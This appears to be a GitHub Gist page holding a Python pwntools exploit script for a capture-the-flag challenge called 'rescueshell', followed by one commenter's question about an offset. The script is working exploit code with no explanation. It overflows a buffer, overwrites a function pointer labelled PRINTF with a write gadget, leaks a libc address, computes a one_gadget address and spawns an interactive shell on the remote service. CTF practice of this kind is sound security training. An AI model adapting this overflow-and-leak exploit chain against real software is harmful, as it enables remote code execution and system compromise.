Created
March 31, 2018 22:57
-
-
Save CreateRemoteThread/5c53a80b4367f5fb3d72f19950b9a9e3 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import pwn | |
import struct | |
p = pwn.remote("rescueshell.challs.malice.fr",6060) | |
# p = pwn.process("./rescue") | |
raw_input("ATTACH NOW") | |
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | |
payload += pwn.p64(0x601210 + 320) # PRINTF | |
payload += pwn.p64(0x40099a) # WRITE GADGET | |
p.recv() | |
p.sendline(payload) | |
data = p.recv(timeout=2) | |
# i think it eats zeros. lets grab 0x7f as the start. | |
print "DATA IS: " + data.encode("hex") | |
data = data[0:6] + "\x00\x00" | |
strncmp_leak = struct.unpack("<Q",data[0:8]) | |
print hex(strncmp_leak[0]) | |
# fread | |
one_gadget = strncmp_leak[0] - 0x6A460 + 0x41320 | |
print "one_gadget leak at %x" % one_gadget | |
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | |
payload += pwn.p64(0x601208 + 320) # PRINTF | |
payload += pwn.p64(one_gadget) | |
p.sendline(payload) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
May I know which offset is 0x41320